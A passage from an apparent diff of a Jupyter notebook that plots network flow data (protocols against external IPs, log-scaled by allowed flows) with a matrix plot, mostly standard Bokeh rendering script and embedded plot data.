table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;700,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[CategoricalAxis(id='1927', ...)],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='1947', ...)],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='1914', ...),</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='1936', ...),</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;900,</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;FactorRange(id='1916', ...),</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;CategoricalScale(id='1920', ...),</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;FactorRange(id='1918', ...),</div></div><div class=\"2009\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;CategoricalScale(id='1922', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2010\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2009\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 13
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Log scaling the size column\r\n",
+    "\r\n",
+    "Note because of a few large values in the data many points are difficult to see in the previous plot.\r\n",
+    "We can change this by plotting the log of the scalar values."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "source": [
+    "all_df.mp_plot.matrix(\r\n",
+    "    x=\"L7Protocol\",\r\n",
+    "    y=\"AllExtIPs\",\r\n",
+    "    value_col=\"TotalAllowedFlows\",\r\n",
+    "    title=\"External IP protocol flows (log of size)\",\r\n",
+    "    log_size=True,\r\n",
+    "    sort=\"asc\",\r\n",
+    ")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2012\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2012\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2012\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"f17d5834-b56c-4f93-a485-07d2d7cacf5f\" data-root-id=\"2014\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"22d50b31-c79b-4864-9adf-7c465aaa663a\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"2025\"}],\"center\":[{\"id\":\"2027\"},{\"id\":\"2030\"}],\"height\":700,\"left\":[{\"id\":\"2028\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"2048\"}],\"title\":{\"id\":\"2015\"},\"toolbar\":{\"id\":\"2037\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"2017\"},\"x_scale\":{\"id\":\"2021\"},\"y_range\":{\"id\":\"2019\"},\"y_scale\":{\"id\":\"2023\"}},\"id\":\"2014\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"red\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"L7Protocol\"},\"y\":{\"field\":\"AllExtIPs\"}},\"id\":\"2047\",\"type\":\"Circle\"},{\"attributes\":{\"axis\":{\"id\":\"2028\"},\"dimension\":1,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2030\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2021\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"2029\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2025\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2027\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2058\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis_label\":\"AllExtIPs\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2052\"},\"major_label_policy\":{\"id\":\"2051\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"5pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2029\"}},\"id\":\"2028\",\"type\":\"CategoricalAxis\"},{\"attributes\":{},\"id\":\"2026\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"axis_label\":\"L7Protocol\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2055\"},\"major_label_orientation\":1.5707963267948966,\"major_label_policy\":{\"id\":\"2054\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2026\"}},\"id\":\"2025\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2031\"},{\"id\":\"2032\"},{\"id\":\"2033\"},{\"id\":\"2034\"},{\"id\":\"2035\"},{\"id\":\"2043\"}]},\"id\":\"2037\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2052\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2036\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"text\":\"External IP protocol flows (log of size)\",\"text_font_size\":\"15pt\"},\"id\":\"2015\",\"type\":\"Title\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"L7Protocol\",\"@L7Protocol\"],[\"AllExtIPs\",\"@AllExtIPs\"],[\"value\",\"@size\"]]},\"id\":\"2043\",\"type\":\"HoverTool\"},{\"attributes\":{\"data_source\":{\"id\":\"2013\"},\"glyph\":{\"id\":\"2046\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2047\"},\"view\":{\"id\":\"2049\"}},\"id\":\"2048\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"90.130.70.73\",\"13.107.4.50\",\"173.194.61.40\",\"205.185.216.42\",\"216.58.218.238\",\"23.223.3.100\",\"23.3.13.106\",\"23.3.13.112\",\"23.3.13.146\",\"23.4.187.27\",\"23.45.180.121\",\"23.45.180.234\",\"23.48.36.47\",\"23.48.36.78\",\"40.80.145.38\",\"40.87.63.92\",\"72.21.81.240\",\"72.21.91.29\",\"8.249.241.254\",\"8.253.45.249\",\"99.84.106.178\",\"99.84.106.27\",\"99.84.106.92\",\"104.43.212.12\",\"13.64.188.245\",\"13.65.107.32\",\"13.67.143.117\",\"13.68.226.108\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.130\",\"13.74.179.117\",\"13.82.152.48\",\"13.83.148.218\",\"13.83.148.235\",\"13.83.149.5\",\"13.86.124.191\",\"13.89.187.212\",\"13.89.220.65\",\"134.170.58.123\",\"157.55.134.136\",\"157.55.134.142\",\"157.55.135.128\",\"168.62.32.212\",\"172.217.15.110\",\"172.217.15.78\",\"172.217.15.99\",\"172.217.8.14\",\"172.217.8.3\",\"20.38.98.100\",\"20.41.41.23\",\"20.42.24.50\",\"204.79.197.200\",\"212.13.197.231\",\"23.47.27.169\",\"23.96.64.84\",\"40.121.3.131\",\"40.124.45.19\",\"40.69.153.67\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.232.95\",\"40.79.85.125\",\"40.85.232.64\",\"40.91.75.5\",\"46.43.34.31\",\"52.165.170.112\",\"52.165.175.144\",\"52.173.26.181\",\"52.173.28.179\",\"52.183.114.173\",\"52.239.152.10\",\"65.52.108.92\",\"65.55.163.76\",\"65.55.163.78\",\"65.55.163.80\",\"65.55.252.190\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.200\",\"99.84.104.63\",\"10.0.3.4\",\"10.0.3.5\",\"131.107.147.209\",\"52.168.138.145\",\"52.179.17.38\",\"10.0.3.4\",\"10.0.3.5\",\"104.211.30.1\"],\"L7Protocol\":[\"ftp\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"https\",\"microsoft-ds\",\"microsoft-ds\",\"ms-wbt-server\",\"ntp\",\"ntp\",\"ssh\",\"ssh\",\"ssh\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8AAAAAAIBIQAAAAAAAAABAAAAAAACARUAAAAAAAAAAQAAAAAAAgERAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAFEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAAEAAAAAAAIBEQAAAAAAAAABAAAAAAAAAAEAAAAAAAIBNQAAAAAAAgElAAAAAAAAA8D8AAAAAAIBEQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAABxAAAAAAAAACEAAAAAAAIBaQAAAAAAAAD1AAAAAAAAAGEAAAAAAAIBAQAAAAAAAYH9AAAAAAADoh0AAAAAAAAAYQAAAAAAAACBAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAADFAAAAAAAAAFEAAAAAAAAAcQAAAAAAAAABAAAAAAAAA8D8AAAAAAAAgQAAAAAAAAABAAAAAAAAAFEAAAAAAAAAoQAAAAAAAAABAAAAAAAAAGEAAAAAAAIBCQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAoQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAsQAAAAAAAABBAAAAAAADgYEAAAAAAAAAAQAAAAAAAADhAAAAAAAAgYEAAAAAAAAAzQAAAAAAAACRAAAAAAAAAOEAAAAAAAAAAQAAAAAAAABRAAAAAAAAAPkAAAAAAAAAzQAAAAAAAAAhAAAAAAAAACEAAAAAAAADwPwAAAAAAACRAAAAAAAAALkAAAAAAAAAUQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAIQAAAAAAAIGBAAAAAAABAcEAAAAAAAAA2QAAAAAAAABxAAAAAAAAAIkAAAAAAAAAiQAAAAAAAADJAAAAAAABAXUAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAyQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[89]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2